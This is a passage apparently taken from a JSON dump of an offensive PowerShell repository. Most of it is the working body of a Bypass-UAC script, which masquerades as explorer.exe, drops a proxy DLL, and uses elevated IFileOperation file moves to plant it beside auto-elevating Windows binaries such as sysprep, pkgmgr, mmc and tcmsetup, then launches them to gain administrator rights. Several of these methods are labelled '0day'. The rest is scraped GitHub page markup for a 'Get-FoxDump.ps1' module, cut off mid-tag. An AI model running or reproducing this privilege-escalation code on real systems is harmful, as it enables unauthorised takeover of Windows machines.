<asmv3:application>\r\n        <asmv3:windowsSettings xmlns=\"http://schemas.microsoft.com/SMI/2005/WindowsSettings\">\r\n          <autoElevate>true</autoElevate>\r\n        </asmv3:windowsSettings>\r\n      </asmv3:application>\r\n      <file\r\n          loadFrom=\"%systemroot%\\system32\\sysprep\\cryptbase.DLL\"\r\n          name=\"cryptbase.DLL\"\r\n          />\r\n     </assembly>\r\n\"@\r\n    \r\n    #---------------\r\n    # Main() function logic, finally!\r\n    #---------------\r\n\r\n    # Perform some checks on the user account\r\n    $IsAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')\r\n    $HasAdminGroup = $(($(whoami /groups) -like \"*S-1-5-32-544*\").length -ne 0)\r\n    $IsMediumIntegrity = $(($(whoami /groups) -like \"*S-1-16-8192*\").length -ne 0)\r\n    \r\n    if ($IsAdmin) {\r\n        echo \"`n[!] Listen, I know it's been a long day but you already have Administrator rights!`n\"\r\n        Return\r\n    } if (!$HasAdminGroup) {\r\n        echo \"`n[!] The current user is not part of the Administrator group!`n\"\r\n        Return\r\n    } if (!$IsMediumIntegrity) {\r\n        echo \"`n[!] The current process is not medium integrity!`n\"\r\n        Return\r\n    }\r\n\r\n    # Unexpected behaviour on Win7 32-bit when run multiple times..\r\n    $ProcStatus = Get-WmiObject Win32_Process -Filter \"ProcessId = '$PID'\"\r\n    if ($ProcStatus.CommandLine -eq \"C:\\Windows\\explorer.exe\") {\r\n        echo \"`n[!] To prevent unexpected behaviour running Bypass-UAC multiple times in the same shell is not advised!`n\"\r\n        Return\r\n    }\r\n\r\n    # Did the user provide a custom dll?\r\n    if ($CustomDll) {\r\n        if (![IO.File]::Exists($CustomDll)) {\r\n            echo \"`n[!] Custom proxy dll path is not valid!`n\"\r\n            Return\r\n        } else {\r\n            # Set proxy dll path\r\n            $DllPath = $CustomDll\r\n        }\r\n    }\r\n\r\n    #-------------------------#\r\n    #    OS version table     #\r\n    #-------------------------#\r\n    # 10.0 -> Win10 / 2k16    #\r\n    # 6.3  -> Win8.1 / 2k12R2 #\r\n    # 6.2  -> Win8 / 2k12     #\r\n    # 6.1  -> Win7 / 2k8R2    #\r\n    # 6.0  -> Vista / 2k8     #\r\n    #-------------------------#\r\n    $OSVersion = [Version](Get-WmiObject Win32_OperatingSystem).Version\r\n    [double]$OSMajorMinor = \"$($OSVersion.Major).$($OSVersion.Minor)\"\r\n    if ($OSMajorMinor -lt 6.0) {\r\n        echo \"`n[!] Sorry, this OS version is not supported!`n\"\r\n        Return\r\n    }\r\n\r\n    # Bool flag architecture $x64/!$x64\r\n    $x64 = $($env:PROCESSOR_ARCHITECTURE -eq \"AMD64\")\r\n\r\n    # UAC bypass methods go here!\r\n    switch ($Method) {\r\n        # UACME method 1\r\n        'UacMethodSysprep'\r\n        {\r\n            # Original Leo Davidson sysprep method\r\n            # Works on everything pre 8.1\r\n            if ($OSMajorMinor -ge 6.3) {\r\n                echo \"[!] Your OS does not support this method!`n\"\r\n                Return\r\n            }\r\n\r\n            # Impersonate explorer.exe\r\n            echo \"`n[!] Impersonating explorer.exe!\"\r\n            Masquerade-PEB -BinPath \"C:\\Windows\\explorer.exe\"\r\n\r\n            if ($DllPath) {\r\n                echo \"[>] Using custom proxy dll..\"\r\n                echo \"[+] Dll path: $DllPath\"\r\n            } else {\r\n                # Write Yamabiko.dll to disk\r\n                echo \"[>] Dropping proxy dll..\"\r\n                Emit-Yamabiko\r\n            }\r\n\r\n            # Expose IFileOperation COM object\r\n            Invoke-IFileOperation\r\n\r\n            # Exploit logic\r\n            echo \"[>] Performing elevated IFileOperation::MoveItem operation..\"\r\n            $IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\\System32\\sysprep\\'), \"cryptbase.dll\")\r\n            $IFileOperation.PerformOperations()\r\n            echo \"`n[?] Executing sysprep..\"\r\n            IEX $($env:SystemRoot + '\\System32\\sysprep\\sysprep.exe')\r\n\r\n            # Clean-up\r\n            echo \"[!] UAC artifact: $($env:SystemRoot + '\\System32\\sysprep\\cryptbase.dll')`n\"\r\n        }\r\n\r\n        # UACME method 23\r\n        'ucmDismMethod'\r\n        {\r\n            # Hybrid DISM method: package.xml -> pkgmgr.exe\r\n            # Works on x64 Win7-Win10 (unpatched)\r\n            if ($OSMajorMinor -lt 6.1) {\r\n                echo \"[!] Your OS does not support this method!`n\"\r\n                Return\r\n            } if (!$x64) {\r\n                echo \"[!] This method is only supported on 64-bit!`n\"\r\n                Return\r\n            }\r\n\r\n            # Impersonate explorer.exe\r\n            echo \"`n[!] Impersonating explorer.exe!\"\r\n            Masquerade-PEB -BinPath \"C:\\Windows\\explorer.exe\"\r\n\r\n            if ($DllPath) {\r\n                echo \"[>] Using custom proxy dll..\"\r\n                echo \"[+] Dll path: $DllPath\"\r\n            } else {\r\n                # Write Yamabiko.dll to disk\r\n                echo \"[>] Dropping proxy dll..\"\r\n                Emit-Yamabiko\r\n            }\r\n\r\n            # Write package XML to disk\r\n            $PackagePath = $env:Temp + \"\\pac$(Get-Random).xml\"\r\n            echo \"[>] Creating XML trigger: $PackagePath\"\r\n            $WinPackageData > $PackagePath\r\n\r\n            # Expose IFileOperation COM object\r\n            Invoke-IFileOperation\r\n\r\n            # Exploit logic\r\n            echo \"[>] Performing elevated IFileOperation::MoveItem operation..\"\r\n            $IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\\System32\\'), \"dismcore.dll\")\r\n            $IFileOperation.PerformOperations()\r\n            echo \"`n[?] Executing PkgMgr..\"\r\n            IEX $($env:SystemRoot + '\\System32\\PkgMgr.exe /n:' + $PackagePath)\r\n\r\n            # Clean-up\r\n            echo \"[!] UAC artifact: $($env:SystemRoot + '\\System32\\dismcore.dll')\"\r\n            echo \"[!] UAC artifact: $PackagePath`n\"\r\n        }\r\n\r\n        # UACME method 20\r\n        'UacMethodMMC2'\r\n        {\r\n            # Hybrid MMC method: mmc -> rsop.msc -> wbemcomn.dll\r\n            # Works on x64 Win7-Win10 (unpatched)\r\n            if ($OSMajorMinor -lt 6.1) {\r\n                echo \"[!] Your OS does not support this method!`n\"\r\n                Return\r\n            } if (!$x64) {\r\n                echo \"[!] This method is only supported on 64-bit!`n\"\r\n                Return\r\n            }\r\n\r\n            # Impersonate explorer.exe\r\n            echo \"`n[!] Impersonating explorer.exe!\"\r\n            Masquerade-PEB -BinPath \"C:\\Windows\\explorer.exe\"\r\n        \r\n            if ($DllPath) {\r\n                echo \"[>] Using custom proxy dll..\"\r\n                echo \"[+] Dll path: $DllPath\"\r\n            } else {\r\n                # Write Yamabiko.dll to disk\r\n                echo \"[>] Dropping proxy dll..\"\r\n                Emit-Yamabiko\r\n            }\r\n\r\n            # Expose IFileOperation COM object\r\n            Invoke-IFileOperation\r\n\r\n            # Exploit logic\r\n            echo \"[>] Performing elevated IFileOperation::MoveItem operation..\"\r\n            $IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\\System32\\wbem\\'), \"wbemcomn.dll\")\r\n            $IFileOperation.PerformOperations()\r\n            echo \"`n[?] Executing mmc..\"\r\n            IEX $($env:SystemRoot + '\\System32\\mmc.exe rsop.msc')\r\n\r\n            # Clean-up\r\n            echo \"[!] UAC artifact: $($env:SystemRoot + '\\System32\\wbem\\wbemcomn.dll')`n\"\r\n        }\r\n\r\n        # UAC \"0day\" ¯\\_(ツ)_/¯\r\n        'UacMethodTcmsetup'\r\n        {\r\n            # Hybrid tcmsetup method: tcmsetup -> tcmsetup.exe.local -> comctl32.dll\r\n            # Works on x64/x32 Win7-Win10 (unpatched)\r\n            if ($OSMajorMinor -lt 6.1) {\r\n                echo \"[!] Your OS does not support this method!`n\"\r\n                Return\r\n            }\r\n\r\n            # Impersonate explorer.exe\r\n            echo \"`n[!] Impersonating explorer.exe!\"\r\n            Masquerade-PEB -BinPath \"C:\\Windows\\explorer.exe\"\r\n\r\n            if ($DllPath) {\r\n                echo \"[>] Using custom proxy dll..\"\r\n                echo \"[+] Dll path: $DllPath\"\r\n            } else {\r\n                # Write Yamabiko.dll to disk\r\n                echo \"[>] Dropping proxy dll..\"\r\n                Emit-Yamabiko\r\n            }\r\n\r\n            # Create tcmsetup.exe.Local folder in %temp%\r\n            $TempFolder = $env:Temp + \"\\tcm$(Get-Random)\"\r\n            echo \"[>] Creating .local trigger folder: $TempFolder\"\r\n            New-Item -Path $TempFolder -ItemType directory |Out-Null\r\n\r\n            # Create possible sub-directories\r\n            dir $($env:SystemRoot + '\\WinSxS') |where-object {\r\n                $_.PSIsContainer -and $_.Name -like \"*microsoft.windows.common*\"\r\n            } | foreach {\r\n                New-Item -Path $TempFolder -Name $_.Name -ItemType directory |Out-Null\r\n                Copy-Item $DllPath -destination $($TempFolder + '\\' + $_.Name + '\\comctl32.dll')\r\n            }\r\n\r\n            # Remove proxy dll\r\n            Del $DllPath\r\n\r\n            # Expose IFileOperation COM object\r\n            Invoke-IFileOperation\r\n\r\n            # Exploit logic\r\n            echo \"[>] Performing elevated IFileOperation::MoveItem operation..\"\r\n            $IFileOperation.MoveItem($TempFolder, $($env:SystemRoot + '\\System32\\'), \"tcmsetup.exe.Local\")\r\n            $IFileOperation.PerformOperations()\r\n\r\n            echo \"`n[?] Executing tcmsetup..\"\r\n            IEX $($env:SystemRoot + '\\System32\\tcmsetup.exe')\r\n\r\n            # Clean-up\r\n            echo \"[!] UAC artifact: $($env:SystemRoot + '\\System32\\tcmsetup.exe.Local\\')`n\"\r\n        }\r\n\r\n        # UAC \"0day\" ¯\\_(ツ)_/¯\r\n        'UacMethodNetOle32'\r\n        {\r\n            # Hybrid MMC method: mmc some.msc -> Microsoft.NET\\Framework[64]\\..\\ole32.dll\r\n            # Works on x64/x32 Win7-Win10 (unpatched)\r\n            if ($OSMajorMinor -lt 6.1) {\r\n                echo \"[!] Your OS does not support this method!`n\"\r\n                Return\r\n            }\r\n\r\n            # Impersonate explorer.exe\r\n            echo \"`n[!] Impersonating explorer.exe!\"\r\n            Masquerade-PEB -BinPath \"C:\\Windows\\explorer.exe\"\r\n\r\n            if ($DllPath) {\r\n                echo \"[>] Using custom proxy dll..\"\r\n                echo \"[+] Dll path: $DllPath\"\r\n            } else {\r\n                # Write Yamabiko.dll to disk\r\n                echo \"[>] Dropping proxy dll..\"\r\n                Emit-Yamabiko\r\n            }\r\n\r\n            # Get default .NET version\r\n            [String]$Net_Version = [System.Reflection.Assembly]::GetExecutingAssembly().ImageRuntimeVersion\r\n\r\n            # Get count of PowerShell processes\r\n            $PS_InitCount = @(Get-Process -Name powershell).Count\r\n\r\n            # Expose IFileOperation COM object\r\n            Invoke-IFileOperation\r\n\r\n            # Exploit logic\r\n            echo \"[>] Performing elevated IFileOperation::MoveItem operation..\"\r\n            # x32/x64 .NET folder\r\n            if ($x64) {\r\n                $IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\\Microsoft.NET\\Framework64\\' + $Net_Version + '\\'), \"ole32.dll\")\r\n            } else {\r\n                $IFileOperation.MoveItem($DllPath, $($env:SystemRoot + '\\Microsoft.NET\\Framework\\' + $Net_Version + '\\'), \"ole32.dll\")\r\n            }\r\n            $IFileOperation.PerformOperations()\r\n            echo \"`n[?] Executing mmc..\"\r\n            IEX $($env:SystemRoot + '\\System32\\mmc.exe gpedit.msc')\r\n\r\n            # Move Yamabiko back to %tmp% after it loads to avoid infinite shells!\r\n            while ($true) {\r\n                $PS_Count = @(Get-Process -Name powershell).Count\r\n                if ($PS_Count -gt $PS_InitCount) {\r\n                    try {\r\n                        # x32/x64 .NET foler\r\n                        if ($x64) {\r\n                            $IFileOperation.MoveItem($($env:SystemRoot + '\\Microsoft.NET\\Framework64\\' + $Net_Version + '\\ole32.dll'), $($env:Temp + '\\'), 'ole32.dll')\r\n                        } else {\r\n                            $IFileOperation.MoveItem($($env:SystemRoot + '\\Microsoft.NET\\Framework\\' + $Net_Version + '\\ole32.dll'), $($env:Temp + '\\'), 'ole32.dll')\r\n                        }\r\n                        $IFileOperation.PerformOperations()\r\n                        break\r\n                    } catch {\r\n                        # Sometimes IFileOperation throws an exception\r\n                        # when executed twice in a row, just rerun..\r\n                    }\r\n                }\r\n            }\r\n\r\n            # Clean-up\r\n            echo \"[!] UAC artifact: $($env:Temp + '\\ole32.dll')`n\"\r\n        }\r\n    }\r\n}"
  },
  {
    "path": "modules/Get-FoxDump.ps1",
    "content": "\n\n\n\n\n\n<!DOCTYPE html>\n<html lang=\"en\">\n  <head>\n    <meta charset=\"utf-8\">\n\n\n\n  <link crossorigin=\"anonymous\" href=\"https://assets-cdn.github.com/assets/frameworks-d7b19415c108234b91acac0d0c02091c860993c13687a757ee345cc1ecd3a9d1.css\" media=\"all\" rel=\"stylesheet\" />\n  <link crossorigin=\"anonymous\" href=\"https://assets-cdn.github.com/assets/github-d3d79f67a533758106eb43cd943edc6cc25eb8b60a18efdb65d7ccb1646af576.css\" media=\"all\" rel=\"stylesheet\" />\n  \n  \n  <link crossorigin=\"anonymous\" href=\"https://assets-cdn.github.com/assets/site-537c466d44a69d38c4bd60c2fd2955373ef96d051bd97b2ad30ed039acc97bff.css\" media=\"all\" rel=\"stylesheet\" />\n  \n\n  <meta name=\"viewport\" content=\"width=device-width\">\n  \n  <title>RandomPS-Scripts/Get-FoxDump.ps1 at master · xorrior/RandomPS-Scripts · GitHub</title>\n  <link rel=\"search\" type=\"application/opensearchdescription+xml\" href=\"/opensearch.xml\" title=\"GitHub\">\n  <link rel=\"fluid-icon\" href=\"https://github.com/fluidicon.png\" title=\"GitHub\">\n  <meta property=\"fb:app_id\" content=\"1401488693436528\">\n\n    \n    <meta content=\"https://avatars3.githubusercontent.com/u/9156069?v=3&amp;s=400\" property=\"og:image\" /><meta content=\"GitHub\" property=\"og:site_name\" /><meta content=\"object\" property=\"og:type\" /><meta content=\"xorrior/RandomPS-Scripts\" property=\"og:title\" /><meta content=\"https://github.com/xorrior/RandomPS-Scripts\" property=\"og:url\" /><meta content=\"RandomPS-Scripts - Random PowerShell scripts\" property=\"og:description\" />\n\n  <link rel=\"assets\" href=\"https://assets-cdn.github.com/\">\n  \n  <meta name=\"pjax-timeout\" content=\"1000\">\n  \n  <meta name=\"request-id\" content=\"E5B6:2159:1CC633D:2D10A90:5906666A\" data-pjax-transient>\n  \n\n  <meta name=\"selected-link\" value=\"repo_source\" data-pjax-transient>\n\n  <meta name=\"google-site-verification\" content=\"KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU\">\n<meta name=\"google-site-verification\" content=\"ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA\">\n    <meta name=\"google-analytics\" content=\"UA-3769691-2\">\n\n<meta content=\"collector.githubapp.com\" name=\"octolytics-host\" /><meta content=\"github\" name=\"octolytics-app-id\" /><meta content=\"https://collector.githubapp.com/github-external/browser_event\" name=\"octolytics-event-url\" /><meta content=\"E5B6:2159:1CC633D:2D10A90:5906666A\" name=\"octolytics-dimension-request_id\" />\n<meta content=\"/&lt;user-name&gt;/&lt;repo-name&gt;/blob/show\" data-pjax-transient=\"true\" name=\"analytics-location\" />\n\n\n\n\n  <meta class=\"js-ga-set\" name=\"dimension1\" content=\"Logged Out\">\n\n\n  \n\n      <meta name=\"hostname\" content=\"github.com\">\n  <meta name=\"user-login\" content=\"\">\n\n      <meta name=\"expected-hostname\" content=\"github.com\">\n    <meta name=\"js-proxy-site-detection-payload\" content=\"MWQ1MTg0Mzk4NzYxZjdjY2RhZmUyMzVkNWI5NDgwMWI3YjY5ZTE0MjQ4ZTVmZGY2MTIwNWNmZWNlNTk4Y2NhNHx7InJlbW90ZV9hZGRyZXNzIjoiOTYuNDcuMjM4LjE0NiIsInJlcXVlc3RfaWQiOiJFNUI2OjIxNTk6MUNDNjMzRDoyRDEwQTkwOjU5MDY2NjZBIiwidGltZXN0YW1wIjoxNDkzNTkxNjU5LCJob3N0IjoiZ2l0aHViLmNvbSJ9\">\n\n\n  <meta name=\"html-safe-nonce\" content=\"88de5babe3b810ac9bb23ef334ad629e9456d488\">\n\n  <meta http-equiv=\"x-pjax-version\" content=\"52e1159c744ba21d485393372d7ad68c\">\n  \n\n    \n  <meta name=\"description\" content=\"RandomPS-Scripts - Random PowerShell scripts\">\n  <meta name=\"go-import\" content=\"github.com/xorrior/RandomPS-Scripts git https://github.com/xorrior/RandomPS-Scripts.git\">\n\n  <meta content=\"9156069\" name=\"octolytics-dimension-user_id\" /><meta content=\"xorrior\" name=\"octolytics-dimension-user_login\" /><meta content=\"31297814\" name=\"octolytics-dimension-repository_id\" /><meta content=\"xorrior/RandomPS-Scripts\" name=\"octolytics-dimension-repository_nwo\" /><meta content=\"true\" name=\"octolytics-dimension-repository_public\" /><meta content=\"false\" name=\"octolytics-dimension-repository_is_fork\" /><meta content=\"31297814\" name=\"octolytics-dimension-repository_network_root_id\" /><meta content=\"xorrior/RandomPS-Scripts\" name=\"octolytics-dimension-repository_network_root_nwo\" />\n        <link href=\"https://github.com/xorrior/RandomPS-Scripts/commits/master.atom\" rel=\"alternate\" title=\"Recent Commits to RandomPS-Scripts:master\" type=\"application/atom+xml\">\n\n\n    <link rel=\"canonical\" href=\"https://github.com/xorrior/RandomPS-Scripts/blob/master/Get-FoxDump.ps1\" data-pjax-transient>\n\n\n  <meta name=\"browser-stats-url\" content=\"https://api.github.com/_private/browser/stats\">\n\n  <meta name=\"browser-errors-url\" content=\"https://api.github.com/_private/browser/errors\">\n\n  <link rel=\"mask-icon\" href=\"https://assets-cdn.github.com/pinned-octocat.svg\" color=\"#000000\">\n  <link rel=\"icon\" type=\"image/x-icon\" href=\"https://assets-cdn.github.com/favicon.ico\">\n\n<meta name=\"theme-color\" content=\"#1e2327\">\n\n\n\n  </head>\n\n  <body class=\"logged-out env-production page-blob\">\n    \n\n\n  <div class=\"position-relative js-header-wrapper \">\n    <a href=\"#start-of-content\" tabindex=\"1\" class=\"accessibility-aid js-skip-to-content\">Skip to content</a>\n    <div id=\"js-pjax-loader-bar\" class=\"pjax-loader-bar\"><div class=\"progress\"></div></div>\n\n    \n    \n    \n\n\n\n          <header class=\"site-header js-details-container Details\" role=\"banner\">\n  <div class=\"container-responsive\">\n    <a class=\"header-logo-invertocat\" href=\"https://github.com/\" aria-label=\"Homepage\" data-ga-click=\"(Logged out) Header, go to homepage, icon:logo-wordmark\">\n      <svg aria-hidden=\"true\" class=\"octicon octicon-mark-github\" height=\"32\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"32\"><path fill-rule=\"evenodd\" d=\"M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8c0-4.42-3.58-8-8-8z\"/></svg>\n    </a>\n\n    <button class=\"btn-link float-right site-header-toggle js-details-target\" type=\"button\" aria-label=\"Toggle navigation\">\n      <svg aria-hidden=\"true\" class=\"octicon octicon-three-bars\" height=\"24\" version=\"1.1\" viewBox=\"0 0 12 16\" width=\"18\"><path fill-rule=\"evenodd\" d=\"M11.41 9H.59C0 9 0 8.59 0 8c0-.59 0-1 .59-1H11.4c.59 0 .59.41.59 1 0 .59 0 1-.59 1h.01zm0-4H.59C0 5 0 4.59 0 4c0-.59 0-1 .59-1H11.4c.59 0 .59.41.59 1 0 .59 0 1-.59 1h.01zM.59 11H11.4c.59 0 .59.41.59 1 0 .59 0 1-.59 1H.59C0 13 0 12.59 0 12c0-.59 0-1 .59-1z\"/></svg>\n    </button>\n\n    <div class=\"site-header-menu\">\n      <nav class=\"site-header-nav\">\n        <a href=\"/features\" class=\"js-selected-navigation-item nav-item\" data-ga-click=\"Header, click, Nav menu - item:features\" data-selected-links=\"/features /features\">\n          Features\n</a>        <a href=\"/business\" class=\"js-selected-navigation-item nav-item\" data-ga-click=\"Header, click, Nav menu - item:business\" data-selected-links=\"/business /business/security /business/customers /business\">\n          Business\n</a>        <a href=\"/explore\" class=\"js-selected-navigation-item nav-item\" data-ga-click=\"Header, click, Nav menu - item:explore\" data-selected-links=\"/explore /trending /trending/developers /integrations /integrations/feature/code /integrations/feature/collaborate /integrations/feature/ship /showcases /explore\">\n          Explore\n</a>        <a href=\"/pricing\" class=\"js-selected-navigation-item nav-item\" data-ga-click=\"Header, click, Nav menu - item:pricing\" data-selected-links=\"/pricing /pricing/developer /pricing/team /pricing/business-hosted /pricing/business-enterprise /pricing\">\n          Pricing\n</a>      </nav>\n\n      <div class=\"site-header-actions\">\n          <div class=\"header-search scoped-search site-scoped-search js-site-search\" role=\"search\">\n  <!-- '\"` --><!-- </textarea></xmp> --></option></form><form accept-charset=\"UTF-8\" action=\"/xorrior/RandomPS-Scripts/search\" class=\"js-site-search-form\" data-scoped-search-url=\"/xorrior/RandomPS-Scripts/search\" data-unscoped-search-url=\"/search\" method=\"get\"><div style=\"margin:0;padding:0;display:inline\"><input name=\"utf8\" type=\"hidden\" value=\"&#x2713;\" /></div>\n    <label class=\"form-control header-search-wrapper js-chromeless-input-container\">\n        <a href=\"/xorrior/RandomPS-Scripts/blob/master/Get-FoxDump.ps1\" class=\"header-search-scope no-underline\">This repository</a>\n      <input type=\"text\"\n        class=\"form-control header-search-input js-site-search-focus js-site-search-field is-clearable\"\n        data-hotkey=\"s\"\n        name=\"q\"\n        value=\"\"\n        placeholder=\"Search\"\n        aria-label=\"Search this repository\"\n        data-unscoped-placeholder=\"Search GitHub\"\n        data-scoped-placeholder=\"Search\"\n        autocapitalize=\"off\">\n        <input type=\"hidden\" class=\"js-site-search-type-field\" name=\"type\" >\n    </label>\n</form></div>\n\n\n          <a class=\"text-bold site-header-link\" href=\"/login?return_to=%2Fxorrior%2FRandomPS-Scripts%2Fblob%2Fmaster%2FGet-FoxDump.ps1\" data-ga-click=\"(Logged out) Header, clicked Sign in, text:sign-in\">Sign in</a>\n            <span class=\"text-gray\">or</span>\n            <a class=\"text-bold site-header-link\" href=\"/join?source=header-repo\" data-ga-click=\"(Logged out) Header, clicked Sign up, text:sign-up\">Sign up</a>\n      </div>\n    </div>\n  </div>\n</header>\n\n\n  </div>\n\n  <div id=\"start-of-content\" class=\"accessibility-aid\"></div>\n\n    <div id=\"js-flash-container\">\n</div>\n\n\n\n  <div role=\"main\">\n        <div itemscope itemtype=\"http://schema.org/SoftwareSourceCode\">\n    <div id=\"js-repo-pjax-container\" data-pjax-container>\n        \n\n\n  <div class=\"pagehead repohead instapaper_ignore readability-menu experiment-repo-nav\">\n    <div class=\"container repohead-details-container\">\n\n\n      <ul class=\"pagehead-actions\">\n  <li>\n      <a href=\"/login?return_to=%2Fxorrior%2FRandomPS-Scripts\"\n    class=\"btn btn-sm btn-with-count tooltipped tooltipped-n\"\n    aria-label=\"You must be signed in to watch a repository\" rel=\"nofollow\">\n    <svg aria-hidden=\"true\" class=\"octicon octicon-eye\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M8.06 2C3 2 0 8 0 8s3 6 8.06 6C13 14 16 8 16 8s-3-6-7.94-6zM8 12c-2.2 0-4-1.78-4-4 0-2.2 1.8-4 4-4 2.22 0 4 1.8 4 4 0 2.22-1.78 4-4 4zm2-4c0 1.11-.89 2-2 2-1.11 0-2-.89-2-2 0-1.11.89-2 2-2 1.11 0 2 .89 2 2z\"/></svg>\n    Watch\n  </a>\n  <a class=\"social-count\" href=\"/xorrior/RandomPS-Scripts/watchers\"\n     aria-label=\"15 users are watching this repository\">\n    15\n  </a>\n\n  </li>\n\n  <li>\n      <a href=\"/login?return_to=%2Fxorrior%2FRandomPS-Scripts\"\n    class=\"btn btn-sm btn-with-count tooltipped tooltipped-n\"\n    aria-label=\"You must be signed in to star a repository\" rel=\"nofollow\">\n    <svg aria-hidden=\"true\" class=\"octicon octicon-star\" height=\"16\" version=\"1.1\" viewBox=\"0 0 14 16\" width=\"14\"><path fill-rule=\"evenodd\" d=\"M14 6l-4.9-.64L7 1 4.9 5.36 0 6l3.6 3.26L2.67 14 7 11.67 11.33 14l-.93-4.74z\"/></svg>\n    Star\n  </a>\n\n    <a class=\"social-count js-social-count\" href=\"/xorrior/RandomPS-Scripts/stargazers\"\n      aria-label=\"65 users starred this repository\">\n      65\n    </a>\n\n  </li>\n\n  <li>\n      <a href=\"/login?return_to=%2Fxorrior%2FRandomPS-Scripts\"\n        class=\"btn btn-sm btn-with-count tooltipped tooltipped-n\"\n        aria-label=\"You must be signed in to fork a repository\" rel=\"nofollow\">\n        <svg aria-hidden=\"true\" class=\"octicon octicon-repo-forked\" height=\"16\" version=\"1.1\" viewBox=\"0 0 10 16\" width=\"10\"><path fill-rule=\"evenodd\" d=\"M8 1a1.993 1.993 0 0 0-1 3.72V6L5 8 3 6V4.72A1.993 1.993 0 0 0 2 1a1.993 1.993 0 0 0-1 3.72V6.5l3 3v1.78A1.993 1.993 0 0 0 5 15a1.993 1.993 0 0 0 1-3.72V9.5l3-3V4.72A1.993 1.993 0 0 0 8 1zM2 4.2C1.34 4.2.8 3.65.8 3c0-.65.55-1.2 1.2-1.2.65 0 1.2.55 1.2 1.2 0 .65-.55 1.2-1.2 1.2zm3 10c-.66 0-1.2-.55-1.2-1.2 0-.65.55-1.2 1.2-1.2.65 0 1.2.55 1.2 1.2 0 .65-.55 1.2-1.2 1.2zm3-10c-.66 0-1.2-.55-1.2-1.2 0-.65.55-1.2 1.2-1.2.65 0 1.2.55 1.2 1.2 0 .65-.55 1.2-1.2 1.2z\"/></svg>\n        Fork\n      </a>\n\n    <a href=\"/xorrior/RandomPS-Scripts/network\" class=\"social-count\"\n       aria-label=\"20 users forked this repository\">\n      20\n    </a>\n  </li>\n</ul>\n\n      <h1 class=\"public \">\n  <svg aria-hidden=\"true\" class=\"octicon octicon-repo\" height=\"16\" version=\"1.1\" viewBox=\"0 0 12 16\" width=\"12\"><path fill-rule=\"evenodd\" d=\"M4 9H3V8h1v1zm0-3H3v1h1V6zm0-2H3v1h1V4zm0-2H3v1h1V2zm8-1v12c0 .55-.45 1-1 1H6v2l-1.5-1.5L3 16v-2H1c-.55 0-1-.45-1-1V1c0-.55.45-1 1-1h10c.55 0 1 .45 1 1zm-1 10H1v2h2v-1h3v1h5v-2zm0-10H2v9h9V1z\"/></svg>\n  <span class=\"author\" itemprop=\"author\"><a href=\"/xorrior\" class=\"url fn\" rel=\"author\">xorrior</a></span><!--\n--><span class=\"path-divider\">/</span><!--\n--><strong itemprop=\"name\"><a href=\"/xorrior/RandomPS-Scripts\" data-pjax=\"#js-repo-pjax-container\">RandomPS-Scripts</a></strong>\n\n</h1>\n\n    </div>\n    <div class=\"container\">\n      \n<nav class=\"reponav js-repo-nav js-sidenav-container-pjax\"\n     itemscope\n     itemtype=\"http://schema.org/BreadcrumbList\"\n     role=\"navigation\"\n     data-pjax=\"#js-repo-pjax-container\">\n\n  <span itemscope itemtype=\"http://schema.org/ListItem\" itemprop=\"itemListElement\">\n    <a href=\"/xorrior/RandomPS-Scripts\" class=\"js-selected-navigation-item selected reponav-item\" data-hotkey=\"g c\" data-selected-links=\"repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches /xorrior/RandomPS-Scripts\" itemprop=\"url\">\n      <svg aria-hidden=\"true\" class=\"octicon octicon-code\" height=\"16\" version=\"1.1\" viewBox=\"0 0 14 16\" width=\"14\"><path fill-rule=\"evenodd\" d=\"M9.5 3L8 4.5 11.5 8 8 11.5 9.5 13 14 8 9.5 3zm-5 0L0 8l4.5 5L6 11.5 2.5 8 6 4.5 4.5 3z\"/></svg>\n      <span itemprop=\"name\">Code</span>\n      <meta itemprop=\"position\" content=\"1\">\n</a>  </span>\n\n    <span itemscope itemtype=\"http://schema.org/ListItem\" itemprop=\"itemListElement\">\n      <a href=\"/xorrior/RandomPS-Scripts/issues\" class=\"js-selected-navigation-item reponav-item\" data-hotkey=\"g i\" data-selected-links=\"repo_issues repo_labels repo_milestones /xorrior/RandomPS-Scripts/issues\" itemprop=\"url\">\n        <svg aria-hidden=\"true\" class=\"octicon octicon-issue-opened\" height=\"16\" version=\"1.1\" viewBox=\"0 0 14 16\" width=\"14\"><path fill-rule=\"evenodd\" d=\"M7 2.3c3.14 0 5.7 2.56 5.7 5.7s-2.56 5.7-5.7 5.7A5.71 5.71 0 0 1 1.3 8c0-3.14 2.56-5.7 5.7-5.7zM7 1C3.14 1 0 4.14 0 8s3.14 7 7 7 7-3.14 7-7-3.14-7-7-7zm1 3H6v5h2V4zm0 6H6v2h2v-2z\"/></svg>\n        <span itemprop=\"name\">Issues</span>\n        <span class=\"Counter\">0</span>\n        <meta itemprop=\"position\" content=\"2\">\n</a>    </span>\n\n  <span itemscope itemtype=\"http://schema.org/ListItem\" itemprop=\"itemListElement\">\n    <a href=\"/xorrior/RandomPS-Scripts/pulls\" class=\"js-selected-navigation-item reponav-item\" data-hotkey=\"g p\" data-selected-links=\"repo_pulls /xorrior/RandomPS-Scripts/pulls\" itemprop=\"url\">\n      <svg 